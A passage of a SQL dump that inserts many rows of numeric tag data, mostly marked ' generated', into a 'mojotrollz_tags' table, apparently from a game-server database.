`comment`) VALUES (1041, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1042, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1043, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1044, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1045, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1046, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1047, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1048, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1049, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1050, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1051, 4, 1, 189, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1052, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1053, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1054, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1056, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1057, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1058, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1059, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1060, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1061, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1062, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1063, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1064, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1065, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1066, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1067, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1068, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1069, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1070, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1071, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1072, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1073, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1074, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1075, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1076, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1077, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1078, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1079, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1080, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1081, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1082, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1083, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1084, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1085, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1086, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1087, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1088, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1089, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1090, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1091, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1092, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1093, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1094, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1095, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1096, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1097, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1098, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1101, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1102, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1103, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1104, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1105, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1106, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1107, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1108, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1109, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1110, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1111, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1112, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1113, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1114, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1115, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1116, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1117, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1118, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1119, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1120, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1121, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1122, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1123, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1124, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1125, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1126, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1127, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1130, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1131, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1132, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1133, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1134, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1135, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1136, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1137, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1138, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1139, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1140, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1141, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1142, 4, 1, 47, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1142, 4, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1143, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1144, 4, 1, 47, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1144, 4, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1145, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1146, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1147, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1149, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1150, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1151, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1152, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1153, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1154, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1159, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1160, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1164, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1166, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1167, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1168, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1169, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1170, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1171, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1172, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1173, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1175, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1176, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1177, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1178, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1179, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1180, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1181, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1182, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1183, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1184, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1185, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1186, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1187, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1188, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1189, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1190, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1191, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1192, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1195, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1196, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1197, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1198, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1199, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1200, 4, 1, 48, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1200, 4, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1201, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1202, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1203, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1204, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1205, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1206, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1218, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1220, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1221, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1222, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1240, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1241, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1242, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1243, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1244, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1245, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1246, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1247, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1248, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1249, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1250, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1258, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1259, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1260, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1262, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1264, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1265, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1266, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1267, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1270, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1271, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1273, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1274, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1275, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1276, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1282, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1285, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1286, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1287, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1301, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1302, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1318, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1318, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1319, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1320, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1321, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1322, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1323, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1324, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1338, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1339, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1358, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1359, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1360, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1361, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1362, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1363, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1364, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1365, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1366, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1367, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1368, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1369, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1370, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1371, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1372, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1373, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1374, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1375, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1380, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1381, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1382, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1383, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1384, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1385, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1386, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1387, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1388, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1389, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1391, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1393, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1394, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1395, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1396, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1398, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1418, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1419, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1420, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1421, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1422, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1424, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1425, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 